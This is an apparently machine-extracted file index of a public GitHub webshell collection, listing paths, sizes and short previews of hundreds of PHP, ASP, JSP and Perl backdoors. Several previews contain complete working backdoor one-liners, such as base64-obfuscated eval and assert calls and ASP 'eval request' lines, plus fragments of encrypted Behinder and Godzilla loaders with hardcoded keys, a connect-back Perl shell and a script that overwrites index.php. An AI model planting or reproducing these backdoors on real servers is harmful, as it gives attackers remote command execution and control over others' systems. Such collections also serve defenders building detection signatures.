"path": "138shell/P/PH Vayv.php.txt",
"chars": 24633,
"preview": "<? if($sistembilgisi > \"\") {phpinfo();} else { ?>\n\n\n<?$fistik=PHVayv;?>\n\n\n<?if ($sildos>\"\") {unlink(\"$dizin/$sildos\");} "
},
{
"path": "138shell/P/PHANTASMA.txt",
"chars": 25942,
"preview": "<CENTER>\n<DIV STYLE=\"font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;\">PHANTASMA- NeW CmD ;) </"
},
{
"path": "138shell/P/PHP Backdoor Connect.pl.txt",
"chars": 2026,
"preview": "#!/usr/bin/perl\nuse IO::Socket;\n#IRAN HACKERS SABOTAGE Connect Back Shell \n#code by:LorD\n#We Are :LorD-C0d3r-NT"
},
{
"path": "138shell/P/PHP Shell.php.txt",
"chars": 37240,
"preview": "<?php \n\n/*\n*****************************************************************************************\n* "
},
{
"path": "138shell/P/PHPRemoteView.txt",
"chars": 86084,
"preview": "<?php\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n *\n * Welcome to phpRemoteView (R"
},
{
"path": "138shell/P/Phyton Shell.py.txt",
"chars": 2334,
"preview": "#!/usr/bin/env python\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# d00r.py 0.3a (reverse|bind)-shell i"
},
{
"path": "138shell/P/Private-i3lue.txt",
"chars": 62707,
"preview": "<?php\n/*\n * webadmin.php - a simple Web-based file manager\n * Copyright (C) 2002 Daniel Wacker <mail@wacker-welt.de>\n *"
},
{
"path": "138shell/P/pHpINJ.php.txt",
"chars": 1124,
"preview": "<?php\n?>\n<html>\n<head>\n<title>|| .::News Remote PHP Shell Injection::. || </title>\n</head>\n<body>\n<header>|| .::News"
},
{
"path": "138shell/P/perlbot.pl.txt",
"chars": 18291,
"preview": "#!/usr/bin/perl\n# ========================= \n# Perl Bot by LKY \n# Obrigado a italo, false e Ragde :D\n# ================="
},
{
"path": "138shell/P/php-backdoor.txt",
"chars": 2800,
"preview": "<?\n// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\\\\n\nob_implicit_flush();\nif(isset($"
},
{
"path": "138shell/P/php-include-w-shell.txt",
"chars": 46934,
"preview": "<?php\n######################################################################\n# we decide if we want syslogging\ncloselog("
},
{
"path": "138shell/P/phpbackdoor15.txt",
"chars": 3865,
"preview": "<?php\nfunction good_link($link)\n{\n $link=ereg_replace(\"/+\",\"/\",$link);\n $link=ereg_replace(\"/[^/(..)]+/\\.\\.\",\"/\",$link"
},
{
"path": "138shell/P/phpjackal.txt",
"chars": 86919,
"preview": "<?php\n#--Config--#\n$login_password= ''; //Set password\n#----------#\nerror_reporting(E_ALL);\nset_time_limit(0);\nini_set(\""
},
{
"path": "138shell/P/phpshell17.txt",
"chars": 4904,
"preview": "<?php\n\ndefine(PHPSHELL_VERSION, 1.7);\n\n/*\n\n**************************************************************\n* PHP Shell *\n"
},
{
"path": "138shell/P/phvayv.php.txt",
"chars": 24633,
"preview": "<? if($sistembilgisi > \"\") {phpinfo();} else { ?>\n\n\n<?$fistik=PHVayv;?>\n\n\n<?if ($sildos>\"\") {unlink(\"$dizin/$sildos\");} "
},
{
"path": "138shell/P/pws.php.txt",
"chars": 869,
"preview": "<html>\n<head>\n<div align=\"left\"><font size=\"1\">Input command :</font></div>\n<form name=\"cmd\" method=\"POST\" enctype=\"mult"
},
{
"path": "138shell/P/pws.txt",
"chars": 869,
"preview": "<html>\n<head>\n<div align=\"left\"><font size=\"1\">Input command :</font></div>\n<form name=\"cmd\" method=\"POST\" enctype=\"mult"
},
{
"path": "138shell/P/ru24_post_sh.txt",
"chars": 520,
"preview": "<?php\n/*\nRu24PostWebShell\nWrited by DreAmeRz\n\nhttp://www.ru24-team.net\n*/\nerror_reporting(0);\n$function=passthru; // sys"
},
{
"path": "138shell/R/Rader.asp.txt",
"chars": 9168,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n\n\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n<meta htt"
},
{
"path": "138shell/R/Rem Exp.asp.txt",
"chars": 7444,
"preview": "<%@ Language=VBScript %>\n<%\nOption Explicit\n\nDim giCount\nDim gvAttributes\n\nDim Ext\n\nDim ScriptFolder\nDim FolderPath\n\nDim"
},
{
"path": "138shell/R/Rem View.php.txt",
"chars": 86084,
"preview": "<?php\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n *\n * Welcome to phpRemoteView (R"
},
{
"path": "138shell/R/Russian.php.txt",
"chars": 4934,
"preview": "<!--\n\n/+--------------------------------+\\\n | KA_uShell |\n | <KAdot Universal Shell> |\n | "
},
{
"path": "138shell/R/r57 Shell.php.txt",
"chars": 79356,
"preview": "<?php\n/******************************************************************************************************/\n/*\n/* "
},
{
"path": "138shell/R/r57.php.txt",
"chars": 103892,
"preview": "<?php\n/******************************************************************************************************/\n/*\n/* "
},
{
"path": "138shell/R/r577.php.txt",
"chars": 86594,
"preview": "<?php\n/******************************************************************************************************/\n/* \n/* \n/"
},
{
"path": "138shell/R/rootshell.txt",
"chars": 13041,
"preview": "<!--\n/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */\n/* ................jdWMMMMMNk&,...JjdMMMHMMHA+."
},
{
"path": "138shell/R/ru24_post_sh.php.txt",
"chars": 520,
"preview": "<?php\n/*\nRu24PostWebShell\nWrited by DreAmeRz\n\nhttp://www.ru24-team.net\n*/\nerror_reporting(0);\n$function=passthru; // sys"
},
{
"path": "138shell/README.md",
"chars": 70,
"preview": "这个是天阳网络技术论坛收集的\r\n\r\n虽然天阳已经关闭\r\n\r\n不过天阳的东西还都是很不错的。。\r\n\r\n留个纪念吧、、\r\n\r\nby tian6"
},
{
"path": "138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt",
"chars": 37684,
"preview": "<?php \n\n\n/*\n*****************************************************************************************\n* "
},
{
"path": "138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt",
"chars": 5306,
"preview": "<head>\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\n</head>\n<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAM"
},
{
"path": "138shell/S/Server Variables.asp.txt",
"chars": 829,
"preview": "<%\nDim Vars\n%>\n\n<p> </p>\n<p> </p>\n<p><font size=\"2\" face=\"Arial, Helvetica, sans-serif\"><strong>A list of all "
},
{
"path": "138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt",
"chars": 11627,
"preview": "<?\n//download Files Code\n$fdownload=$_GET['fdownload'];\nif ($fdownload <> \"\" ){\n// path & file name\n$path_parts = pathi"
},
{
"path": "138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt",
"chars": 5164,
"preview": "<?php\n\n/*Simorgh Security Magazine */\n session_start();\nif (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {\n "
},
{
"path": "138shell/S/Sincap.php.txt",
"chars": 3916,
"preview": "<html>\n\n<head>\n<meta http-equiv=\"Content-Language\" content=\"tr\">\n<meta name=\"GENERATOR\" content=\"Microsoft FrontPage 6.0"
},
{
"path": "138shell/S/SnIpEr_SA Shell.txt",
"chars": 100897,
"preview": "<?php\n/******************************************************************************************************/\n/* "
},
{
"path": "138shell/S/s.php.txt",
"chars": 98937,
"preview": "<?php\n/******************************************************************************************************/\n/* \n/* "
},
{
"path": "138shell/S/s72 Shell v1.1 Coding.txt",
"chars": 5104,
"preview": "<html>\n\n<head>\n<meta http-equiv=\"Content-Language\" content=\"tr\">\n<meta name=\"GENERATOR\" content=\"Microsoft FrontPage 5.0"
},
{
"path": "138shell/S/shell.php.txt",
"chars": 3801,
"preview": "<?php\n\ndefine('PHPSHELL_VERSION', '1.7');\n\n?>\n\n<html>\n<head>\n<title> Matamu Mat </title>\n</head>\n<body>\n<hr><br>\n\n<?php\n"
},
{
"path": "138shell/S/shellbot.pl.txt",
"chars": 22126,
"preview": "#!/usr/bin/perl#\n###############################################################################################\n# Shel"
},
{
"path": "138shell/S/simple-backdoor.txt",
"chars": 328,
"preview": "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->\n\n<?php\n\nif(isset($_REQUEST['cmd'])){\n echo \"<pre>\";\n "
},
{
"path": "138shell/S/simple_cmd.txt",
"chars": 335,
"preview": "<html>\n<head>\n<title>G-Security Webshell</title>\n</head>\n\n<body bgcolor=#000000 text=#ffffff \">\n<form method=POST>\n<br>\n"
},
{
"path": "138shell/S/smtpd.py.txt",
"chars": 18008,
"preview": "#!/usr/local/bin/python\n\"\"\"An RFC 2821 smtp proxy.\n\nUsage: %(program)s [options] [localhost:localport [remotehost:remote"
},
{
"path": "138shell/S/spy.php.txt",
"chars": 86594,
"preview": "<?php\n/******************************************************************************************************/\n/* \n/* \n/"
},
{
"path": "138shell/S/sql.php.txt",
"chars": 34391,
"preview": "<?\n/*\n * MySQL Web Interface Version 0.8\n * -------------------------------\n * Developed By SooMin Kim (smkim@popeye.snu"
},
{
"path": "138shell/T/Test.php.txt",
"chars": 213,
"preview": "<?php\n$entry_line=\"HACKed by EntriKa\";\n$fp = fopen(\"index.php\", \"w\");\nfputs($fp, $entry_line);\nfclose($fp);\n?>\n\n<? \n$fp "
},
{
"path": "138shell/T/Tool.asp.txt",
"chars": 45537,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<%\nOn Error Resume Next\nServer.ScriptTimeOut = 7200\nClass FileUploader\n\tPublic Files"
},
{
"path": "138shell/T/telnet.cgi.txt",
"chars": 26840,
"preview": "#!/usr/bin/perl\n#------------------------------------------------------------------------------\n# Copyright and Licence\n"
},
{
"path": "138shell/T/telnet.pl.txt",
"chars": 23163,
"preview": "#!/usr/bin/perl\n#------------------------------------------------------------------------------\n# Copyright and Licence\n"
},
{
"path": "138shell/T/telnetd.pl.txt",
"chars": 11253,
"preview": "#!/usr/bin/perl\n# Telnet-like Standard Daemon 0.7\n#\n# 0ldW0lf - oldwolf@atrixteam.net\n# - old-wolf@zipmai."
},
{
"path": "138shell/U/Uploader.php.txt",
"chars": 280,
"preview": "<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"uploader.php\" METHOD=\"POST\">\n<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value"
},
{
"path": "138shell/W/WebShell.cgi.txt",
"chars": 25560,
"preview": "#!/usr/bin/perl\n###############################################################################\n### Gamma Web Shell\n### "
},
{
"path": "138shell/W/WinX Shell.txt",
"chars": 5057,
"preview": "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>\n<body bgcolor=\"#FFFFFF\" text=\"#000000\" link=\"#0066FF\" vlink"
},
{
"path": "138shell/W/Worse Linux Shell.txt",
"chars": 2455,
"preview": "<?php\n\nset_magic_quotes_runtime(0);\n\nprint \"<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2p"
},
{
"path": "138shell/W/w.php.txt",
"chars": 131590,
"preview": "<?php\n//Starting calls\nif (!function_exists(\"getmicrotime\")) {function getmicrotime() {list($usec, $sec) = explode(\" \", "
},
{
"path": "138shell/W/w3d.php.txt",
"chars": 3955,
"preview": "<?php\n/*\nW3D Shell\nBy: Warpboy\nwww.private-node.net\nVersion: 0x01\nInfo: Created specifically for straight-foreward SQL i"
},
{
"path": "138shell/W/w4k.php.txt",
"chars": 142735,
"preview": "<?php\nif (!function_exists(\"myshellexec\"))\n{\nif(is_callable(\"popen\")){\nfunction myshellexec($command) {\nif (!($p=popen(\""
},
{
"path": "138shell/W/wacking.php.txt",
"chars": 142735,
"preview": "<?php\nif (!function_exists(\"myshellexec\"))\n{\nif(is_callable(\"popen\")){\nfunction myshellexec($command) {\nif (!($p=popen(\""
},
{
"path": "138shell/W/webshell.txt",
"chars": 70657,
"preview": "<?php\n\n//This PHP Web Shell was developed by Digital Outcast It is open software and completely free to modify in any w"
},
{
"path": "138shell/X/xinfo.php.txt",
"chars": 111573,
"preview": "<?\n\nif (ini_get('register_globals') != '1') {\n\n if (!empty($HTTP_POST_VARS))\n\n extract($HTTP_POST_VARS);\n\n\n\n if (!"
},
{
"path": "138shell/Z/Zehir 4.asp.txt",
"chars": 50116,
"preview": "<%\nmpat=replace(Request.ServerVariables(\"PATH_TRANSLATED\"),\"/\",\"\\\")\ndosyaPath = mid(mpat,InStrRev(mpat,\"\\\")+1)\non error "
},
{
"path": "138shell/Z/zacosmall.php.txt",
"chars": 15878,
"preview": "<?\n ##########################################################\n # Small PHP Web Shell by ZaCo (c) 2004-2006 "
},
{
"path": "138shell/Z/zacosmall.txt",
"chars": 15878,
"preview": "<?\n ##########################################################\n # Small PHP Web Shell by ZaCo (c) 2004-2006 "
},
{
"path": "138shell/Z/zehir4.asp.txt",
"chars": 50116,
"preview": "<%\nmpat=replace(Request.ServerVariables(\"PATH_TRANSLATED\"),\"/\",\"\\\")\ndosyaPath = mid(mpat,InStrRev(mpat,\"\\\")+1)\non error "
},
{
"path": "Backdoor Dev Shells/Source/devilzShell.asp",
"chars": 60136,
"preview": "<%@ Language = \"VBscript\" %><% On Error Resume Next %><% Server.ScriptTimeout=600 %><% session.lcid=2057 %>\n<%\n'# devilz"
},
{
"path": "Backdoor Dev Shells/Source/devilzShell.aspx",
"chars": 65042,
"preview": "<%\n'#\n'# devilzShell <[aspx]>\n'# ^^^^^^^^^^^^\n'# author: b374k\n'# greets: devilzc0der(s) and all of you who love peace a"
},
{
"path": "Backdoor Dev Shells/Source/devilzShell.cgi",
"chars": 50929,
"preview": "#!/usr/bin/perl\n##\n## devilzShell <[cgi]>\n## ^^^^^^^^^^^^\n## author: b374k\n## greets: devilzc0der(s) and all of you who "
},
{
"path": "Backdoor Dev Shells/Source/devilzShell.jsp",
"chars": 64630,
"preview": "<%@ page contentType=\"text/html\"%><%@ page import=\"java.io.*,java.util.*,java.net.*,java.text.*,sun.misc.*,java.security"
},
{
"path": "Backdoor Dev Shells/Source/devilzShell.php",
"chars": 48668,
"preview": "<?php\n//\n// devilzShell <[php]>\n// ^^^^^^^^^^^^\n// author: b374k\n// greets: devilzc0der(s) and all of you who love peace"
},
{
"path": "Backdoor Dev Shells/devshell.asp",
"chars": 65021,
"preview": "<%@ Language = \"VBscript.Encode\" %>\r\n<%\r\n'# devilzShell <[asp]>\r\n'# ^^^^^^^^^^^^\r\n'# author: b374k\r\n'# greets: devilzc0d"
},
{
"path": "Backdoor Dev Shells/devshell.aspx",
"chars": 65042,
"preview": "<%\n'#\n'# devilzShell <[aspx]>\n'# ^^^^^^^^^^^^\n'# author: b374k\n'# greets: devilzc0der(s) and all of you who love peace a"
},
{
"path": "Backdoor Dev Shells/devshell.cgi",
"chars": 68278,
"preview": "#!/usr/bin/perl\n##\n## devilzShell <[cgi]>\n## ^^^^^^^^^^^^\n## author: b374k\n## greets: devilzc0der(s) and all of you who "
},
{
"path": "Backdoor Dev Shells/devshell.jsp",
"chars": 64630,
"preview": "<%@ page contentType=\"text/html\"%><%@ page import=\"java.io.*,java.util.*,java.net.*,java.text.*,sun.misc.*,java.security"
},
{
"path": "Backdoor Dev Shells/devshell.php",
"chars": 26186,
"preview": "<?php\n//\n// devilzShell <[php]>\n// ^^^^^^^^^^^^\n// author: b374k\n// greets: devilzc0der(s) and all of you who love peace"
},
{
"path": "Backdoor Dev Shells/readme.md",
"chars": 108,
"preview": "DevShell全套支持asp,aspx,php,jsp,cgi,cfm(含源码) 其中devshell.cfm 是CFM的马 密码:adobe123 使用方式:http://url/test.cfm?o=login"
},
{
"path": "Behinder/readme.md",
"chars": 642,
"preview": "## [Behinder](https://github.com/rebeyond/Behinder)\n\nAuthor:[rebeyond](https://github.com/rebeyond)\n\nLatest version upda"
},
{
"path": "Behinder/shell-2021-03-18.php",
"chars": 818,
"preview": "<?php\n@error_reporting(0);\nsession_start();\n$t=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(10"
},
{
"path": "Behinder/shell-2021-04-23.php",
"chars": 993,
"preview": "<?php\n@error_reporting(0);\nsession_start();\n$t='{{{{{{{{{{{{{'^chr(25).chr(26).chr(8).chr(30).chr(77).chr(79).chr(36).ch"
},
{
"path": "Behinder/shell.asp",
"chars": 232,
"preview": "<%\nResponse.CharSet = \"UTF-8\" \nSession(\"k\")=k\nk=Session(\"k\")\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFo"
},
{
"path": "Behinder/shell.aspx",
"chars": 400,
"preview": "<%@ Page Language=\"C#\" %><%@Import Namespace=\"System.Reflection\"%><%Session.Add(\"k\",\"e45e329feb5d925b\"); Response.Write("
},
{
"path": "Behinder/shell.jsp",
"chars": 542,
"preview": "AAAAA<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){su"
},
{
"path": "Behinder/shell.php",
"chars": 589,
"preview": "<?php\n@error_reporting(0);\nsession_start();\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST')\n{\n $key=\"e45e329feb5d925b\";\n\t"
},
{
"path": "Behinder/shell2020-12-06.php",
"chars": 620,
"preview": "<?php\n@error_reporting(0);\nsession_start();\n$key=\"e45e329feb5d925b\"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond\n$_SESSION['k'"
},
{
"path": "Behinder/简单的冰蝎流量魔改.md",
"chars": 3755,
"preview": "感觉冰蝎流量魔改的文章比较少,我自己琢磨了一下,感觉简单地做个流量魔改并不复杂,发出来供大家参考。我自己是个Java笨比,有问题的地方欢迎大佬们评论区指正共同学习。\n\n0x00 冰蝎源码\n---------\n\n冰蝎源码的获取,可以下载冰蝎,"
},
{
"path": "Godzilla/123.ashx",
"chars": 1673,
"preview": "<%@ Language=\"C#\" Class=\"Handler1\" %>\r\n public class Handler1 : System.Web.IHttpHandler,System.Web.SessionState.IReq"
},
{
"path": "Godzilla/123.asmx",
"chars": 1575,
"preview": "<%@ WebService Language=\"C#\" Class=\"WebService1\" %>\r\npublic class WebService1 : System.Web.Services.WebService\r\n{\r\n p"
},
{
"path": "Godzilla/123.aspx",
"chars": 1319,
"preview": "<%@ Page Language=\"C#\"%><%try{string key = \"202cb962ac59075b\";string pass = \"123\";string md5 = System.BitConverter.ToStr"
},
{
"path": "Godzilla/123.jsp",
"chars": 2589,
"preview": "<%! String xc=\"202cb962ac59075b\"; String pass=\"123\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(Class"
},
{
"path": "Godzilla/123.jspx",
"chars": 2722,
"preview": "<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" version=\"1.2\"><jsp:declaration> String xc=\"202cb962ac59075b\"; String "
},
{
"path": "Godzilla/123.php",
"chars": 836,
"preview": "<?php\n session_start();\n @set_time_limit(0);\n\t@error_reporting(0);\n function E($D,$K){\n for($i=0;$i<strl"
},
{
"path": "Godzilla/20220213.php",
"chars": 840,
"preview": "<?php\n session_start();\n @set_time_limit(0);\n\t@error_reporting(0);\n function E($D,$K){\n for($i=0;$i<strl"
},
{
"path": "Godzilla/20220213_02.php",
"chars": 631,
"preview": "<?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n for($i=0;$i<strlen($D);$i++"
},
{
"path": "Godzilla/20220213_03.php",
"chars": 842,
"preview": "<?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n for($i=0;$i<strlen($D);$i++"
},
{
"path": "LICENSE",
"chars": 1062,
"preview": "MIT License\n\nCopyright (c) 2022 tennc\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof t"
},
{
"path": "README.md",
"chars": 3259,
"preview": "# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md) | [Türkiye](https://github.com/tennc"
},
{
"path": "README_EN.md",
"chars": 3746,
"preview": "webshell\r\n[简体中文](https://github.com/tennc/webshell/blob/master/README.md)\r\n========\r\nThis is a webshell collection proje"
},
{
"path": "README_TR.md",
"chars": 2247,
"preview": "# webshell\n[简体中文](https://github.com/tennc/webshell/blob/master/README.md)\n========\n\nBu, bir web kabuğu koleksiyon proje"
},
{
"path": "SECURITY.md",
"chars": 90,
"preview": "# Security Policy\n\n## Reporting a Vulnerability\n\nPlease report security issues to <email>\n"
},
{
"path": "_config.yml",
"chars": 26,
"preview": "theme: jekyll-theme-hacker"
},
{
"path": "antSword/mybase.md",
"chars": 886,
"preview": "shell code\n```php\n<?php \n$a = $_POST['n985de9'];\nif(isset($a)) {\n eval(base64_decode($a));\n}\n?>\n```\n\nadd : source/cor"
},
{
"path": "antSword-shells/README.md",
"chars": 415,
"preview": "## AntSword-Shell-Scripts\n> 此目录用于存放中国蚁剑一些示例的服务端脚本文件,仅供参考。\n\nAntSword(中国蚁剑)是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管"
},
{
"path": "antSword-shells/WebLogic_Shiro.md",
"chars": 2032,
"preview": "``` java\n\nYWFhYWFhYWFhYWFhYWFhYW4WyDHgFb0DhQAQ46Kgw+r8soc6/b5FErU9nSlqEsyHJ8x4xnqm1ex86u/xBiUprKSOWmYZAMmwfWmzi9V1lvBG13"
},
{
"path": "antSword-shells/jsp_custom_script_for_oracle.jsp",
"chars": 20841,
"preview": "<%--\n _ ____ _\n __ _ _ __ | |_/ ___|_ _____ _ __ __| |\n / _` | '_ \\| __\\___ \\"
},
{
"path": "antSword-shells/jsp_custom_spy_for_mysql.jsp",
"chars": 13904,
"preview": "<%--\n _ ____ _\n __ _ _ __ | |_/ ___|_ _____ _ __ __| |\n / _` | '_ \\| __\\___ \\"
},
{
"path": "antSword-shells/jspx_custom_script_for_mysql.jspx",
"chars": 23130,
"preview": "<!--\n _ ____ _\n __ _ _ __ | |_/ ___|_ _____ _ __ __| |\n / _` | '_ \\| __\\___ \\"
},
{
"path": "antSword-shells/php1.php",
"chars": 337,
"preview": "<?php\n\nclass Test1\n{\n public function __construct($para, $_value)\n {\n $para($_value);\n }\n}\n\n\n$class1 = n"
},
{
"path": "antSword-shells/php2.php",
"chars": 473,
"preview": "<?php\nclass Test1\n{\n private $para1 = '';\n private $para2 = '';\n\n public function __invoke($para1, $para2)\n "
},
{
"path": "antSword-shells/php3.php",
"chars": 632,
"preview": "<?php\n\ntrait Dog\n{\n public $name=\"dog\";\n\n public function drive()\n {\n echo \"This is dog drive\";\n }\n "
},
{
"path": "antSword-shells/php_assert.php",
"chars": 59,
"preview": "<?php $ant=base64_decode(\"YXNzZXJ0\");$ant($_POST['ant']);?>"
},
{
"path": "antSword-shells/php_create_function.php",
"chars": 87,
"preview": "<?php $ant=create_function(\"\", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));$ant();?>"
},
{
"path": "antSword-shells/php_custom_script_for_mysql_fix.php",
"chars": 11807,
"preview": "<?php\n/**\n* _ ____ _\n* __ _ _ __ | |_/ ___|_ _____ _ __ __| |\n* / _` | '_ "
},
{
"path": "antSword-shells/php_custom_spy_for_mysql.php",
"chars": 10432,
"preview": "<?php\n/**\n* _ ____ _\n* __ _ _ __ | |_/ ___|_ _____ _ __ __| |\n* / _` | '_ "
},
{
"path": "antSword-shells/python2_custom_script.py",
"chars": 10113,
"preview": "#!/usr/bin/env python\n# coding:utf-8\nfrom __future__ import print_function\nimport os\nimport cgi\nimport time\nimport stat\n"
},
{
"path": "asp/08小组内部交流专用.asp.txt",
"chars": 1785,
"preview": "<%@ Page Language=\"C#\" AutoEventWireup=\"true\" validateRequest=\"false\"%>\n<html>\n<head runat=\"server\">\n <title>08Сڲר w"
},
{
"path": "asp/1d.asp",
"chars": 92132,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<%UserPass=\"admin\"'\t\nServer.ScriptTimeout=999999999\nOn Error Resume Next\nmmname =\"Ȩר"
},
{
"path": "asp/2013110125027897.asp",
"chars": 83586,
"preview": "<object runat=server id=oScriptlhn scope=page classid=\"clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8\"></object>\n<%@ LANGUAG"
},
{
"path": "asp/2022-08-12.aspx.txt",
"chars": 628,
"preview": "<%@Page Language=\"Jscript\"%> \n<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Nj"
},
{
"path": "asp/404.asp",
"chars": 111148,
"preview": "<%@ LANGUAGE = VBScript.Encode %><% Response.Buffer=True:Server.ScriptTimeout=999999999'ֹʱ\r\nUserPass=\"404\"'MD5\r\nNameTitl"
},
{
"path": "asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt",
"chars": 84760,
"preview": "<object runat=server id=oScriptlhn scope=page classid=\"clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8\"></object>\n<object run"
},
{
"path": "asp/ASPXspy2.aspx",
"chars": 75305,
"preview": "<%@ Page Language=\"C#\" Debug=\"true\" trace=\"false\" validateRequest=\"false\" EnableViewStateMac=\"false\" EnableViewState=\"tr"
},
{
"path": "asp/ASP一句话.txt",
"chars": 1112,
"preview": "[+]ASP一句话\r\n\r\n1) <%eval request(\"sb\")%>\r\n2) <%execute request(\"sb\")%>\r\n3) <%execute(request(\"sb\"))%>\r\n4) <%execute reques"
},
{
"path": "asp/ASP一句话02.txt",
"chars": 171,
"preview": "ASP\n\n<%eval request(\"sb\")%>\n\n<%execute request(\"sb\")%>\n\n%><%Eval(Request(chr(35)))%><%\n\n<%ExecuteGlobal request(\"sb\")%>\n"
}
]
// ... and 1438 more files (download for full content)
About this extraction
This page contains the full source code of the tennc/webshell GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 1638 files (68.4 MB), approximately 18.0M tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.